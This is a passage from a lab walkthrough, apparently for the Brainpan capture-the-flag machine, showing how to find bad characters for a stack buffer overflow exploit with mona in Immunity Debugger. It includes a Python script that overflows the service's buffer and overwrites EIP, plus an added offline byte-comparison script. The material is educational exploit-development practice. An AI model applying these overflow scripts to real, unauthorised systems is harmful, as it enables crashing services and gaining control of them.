When crafting shellcode, it is crucial to identify which characters may cause problems, referred to as bad characters, and which are safe to use. To streamline the process of finding the bad characters for our exploit, we will leverage mona within Immunity Debugger. First, we configure mona's working directory in Immunity Debugger with the following command:

!mona config -set workingfolder c:\mona

This sets the working directory for mona in Immunity Debugger. With the working directory configured, we can generate a bad character byte array with mona, excluding the null byte (\x00) via -cpb, using the following command:

!mona bytearray -cpb "\x00"

The generated bad character byte array is stored in the mona working directory, in a file named bytearray.txt (mona also writes a binary copy, bytearray.bin, which we use for the comparison later).

We then send this bad character array to our brainpan.exe TCP server, placed directly after the bytes that overwrite EIP. For this purpose, I've created another script called brainpan_badchars.py, which appends the mona bad character array to the payload.
#!/usr/bin/python3
import sys
import socket

# Byte array produced by: !mona bytearray -cpb "\x00"  (0x01..0xff, null byte excluded)
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# 510 bytes of padding reach the saved return address, "BBBB" overwrites EIP,
# and the byte array lands immediately after it, where ESP points at the crash.
buffer = b"A" * 510 + b"B" * 4 + badchars

# Send the payload once; the earlier fuzzing loop is not needed here.
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192.168.10.4', 9999))
    payload = b'shitstorm /.:/' + buffer
    sock.send(payload)
    sock.close()
except socket.error as e:
    print("Error connecting to the server:", e)
    sys.exit(1)
After executing the script, we inspect the ESP (Extended Stack Pointer) dump in Immunity Debugger: right-click the ESP register and select Follow in Dump from the context menu. The dump window then shows the hex bytes that our Python script sent, so we can clearly observe the whole bad character array in memory.

The ESP register held the address 005FF910. To check for any undesirable characters specific to our exploit, we ran mona with the following command within Immunity Debugger:

!mona compare -f c:\mona\bytearray.bin -a 005FF910

Mona compared the generated byte array with the bytes found at ESP. In the case of brainpan.exe, no bad characters were detected for our shellcode (apart from the null byte we excluded when generating the array).
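As an added example that is not part of the original post and not mona's own code, the following script reproduces offline the check that !mona compare performs, with constructed dumps standing in for a real ESP dump. It also rebuilds the -cpb style array so that the next run can exclude whatever the first run found.

```python
#!/usr/bin/python3
# Added example (not the author's brainpan_badchars.py and not mona's code):
# an offline version of the "!mona compare" check. All dumps below are constructed.

def build_bytearray(exclude=(0x00,)):
    """Return the 0x01..0xff test array, skipping excluded bytes (like mona bytearray -cpb)."""
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(expected, dump):
    """Compare the array we sent with the bytes found at ESP.

    Returns a list of (offset, sent_byte, seen_byte). seen_byte is None when the
    dump ends early, i.e. the sent byte acted as a terminator. A byte replaced in
    place (dump stays aligned) is recorded and the scan continues; once the dump
    loses alignment the scan stops, because every later byte would be reported
    as bad as well. Trailing memory beyond the array length is ignored.
    """
    bad = []
    for i, sent in enumerate(expected):
        if i >= len(dump):
            bad.append((i, sent, None))  # truncated: everything after was dropped
            break
        seen = dump[i]
        if seen == sent:
            continue
        bad.append((i, sent, seen))
        nxt = i + 1
        still_aligned = nxt >= len(expected) or (nxt < len(dump) and dump[nxt] == expected[nxt])
        if not still_aligned:
            break  # rerun with this byte excluded to find the next one
    return bad


if __name__ == "__main__":
    sent = build_bytearray()
    # Constructed dumps: a clean copy (the brainpan.exe outcome), one where \x0a
    # was turned into a space, and one cut off at \x0d as a line terminator would do.
    cases = (("clean", sent),
             ("substituted", sent.replace(b"\x0a", b"\x20")),
             ("truncated", sent[:sent.index(b"\x0d")]))
    for name, dump in cases:
        found = [(hex(s), None if v is None else hex(v)) for _, s, v in find_badchars(sent, dump)]
        print(name, found)
```

Each run reports only the first byte that breaks alignment, which is why bad characters are found one at a time and removed from the array before the next run.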
Now that we have identified the bad characters to avoid in our exploit, our next step is to find a suitable module for our payload.

Next: Finding the right module